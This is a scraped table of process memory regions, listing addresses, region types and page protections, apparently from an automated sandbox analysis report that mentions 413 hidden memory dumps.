||
|
7FF7C0D10000
|
trusted library allocation
|
page read and write
|
||
|
759B87F000
|
stack
|
page read and write
|
||
|
26F2DC1E000
|
trusted library allocation
|
page read and write
|
||
|
26F2DC22000
|
trusted library allocation
|
page read and write
|
||
|
BC2EFFE000
|
stack
|
page read and write
|
||
|
1F507DE0000
|
heap
|
page read and write
|
||
|
1F507C0E000
|
heap
|
page read and write
|
||
|
1EB00C04000
|
heap
|
page read and write
|
||
|
1EB02D3D000
|
trusted library allocation
|
page read and write
|
||
|
1F509B02000
|
heap
|
page read and write
|
||
|
5BBE4FE000
|
stack
|
page read and write
|
||
|
7FF7C0E30000
|
trusted library allocation
|
page read and write
|
||
|
1EB00E55000
|
heap
|
page read and write
|
||
|
759B4E3000
|
stack
|
page read and write
|
||
|
7FF7C0E70000
|
trusted library allocation
|
page read and write
|
||
|
BC2E8FE000
|
stack
|
page read and write
|
||
|
7FF7C0E70000
|
trusted library allocation
|
page read and write
|
||
|
1F509B13000
|
heap
|
page read and write
|
||
|
7FF7C0D21000
|
trusted library allocation
|
page read and write
|
||
|
759BAF9000
|
stack
|
page read and write
|
||
|
26F45C0E000
|
heap
|
page read and write
|
||
|
1F509B4B000
|
heap
|
page read and write
|
||
|
26F2D2D0000
|
heap
|
page read and write
|
||
|
1EB1ACD0000
|
heap
|
page read and write
|
||
|
7FF7C0F20000
|
trusted library allocation
|
page read and write
|
||
|
1F507BE5000
|
heap
|
page read and write
|
||
|
26F2DA42000
|
trusted library allocation
|
page read and write
|
||
|
26F2F1E1000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0D21000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0DF0000
|
trusted library allocation
|
page read and write
|
||
|
1F509AC4000
|
heap
|
page read and write
|
||
|
1EB00BD0000
|
heap
|
page read and write
|
||
|
1EB02D43000
|
trusted library allocation
|
page read and write
|
||
|
1EB00BC0000
|
heap
|
page read and write
|
||
|
1EB02AC0000
|
heap
|
page execute and read and write
|
||
|
26F2DC4A000
|
trusted library allocation
|
page read and write
|
||
|
BC2ECFF000
|
stack
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
26F2F2D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E00000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0B80000
|
trusted library allocation
|
page read and write
|
||
|
2E8F000
|
stack
|
page read and write
|
||
|
1EB03254000
|
trusted library allocation
|
page read and write
|
||
|
26F2B8A0000
|
heap
|
page read and write
|
||
|
1F509AEF000
|
heap
|
page read and write
|
||
|
1F507B37000
|
heap
|
page read and write
|
||
|
26F2F15A000
|
trusted library allocation
|
page read and write
|
||
|
1EB1B0A0000
|
heap
|
page read and write
|
||
|
26F2DC11000
|
trusted library allocation
|
page read and write
|
||
|
26F3D830000
|
trusted library allocation
|
page read and write
|
||
|
1EB0324A000
|
trusted library allocation
|
page read and write
|
||
|
1EB02D4B000
|
trusted library allocation
|
page read and write
|
||
|
759BA7E000
|
stack
|
page read and write
|
||
|
1F509AA9000
|
heap
|
page read and write
|
||
|
26F2B8A5000
|
heap
|
page read and write
|
||
|
1F509BA1000
|
heap
|
page read and write
|
||
|
26F2DC05000
|
trusted library allocation
|
page read and write
|
||
|
1F509B74000
|
heap
|
page read and write
|
||
|
26F4594B000
|
heap
|
page read and write
|
||
|
26F2D6B2000
|
trusted library allocation
|
page read and write
|
||
|
1EB02BD0000
|
heap
|
page execute and read and write
|
||
|
1F509AAB000
|
heap
|
page read and write
|
||
|
26F2F462000
|
trusted library allocation
|
page read and write
|
||
|
1F509C0D000
|
heap
|
page read and write
|
||
|
1EB02BC3000
|
heap
|
page read and write
|
||
|
7FF7C0D60000
|
trusted library allocation
|
page execute and read and write
|
||
|
26F45A60000
|
heap
|
page read and write
|
||
|
26F2B8C0000
|
heap
|
page read and write
|
||
|
1EB02B72000
|
heap
|
page read and write
|
||
|
26F2DE48000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C0E20000
|
trusted library allocation
|
page read and write
|
||
|
759BEBE000
|
stack
|
page read and write
|
||
|
7FF7C0E60000
|
trusted library allocation
|
page read and write
|
||
|
1EB00BF8000
|
heap
|
page read and write
|
There are 413 hidden memdumps, click here to show them.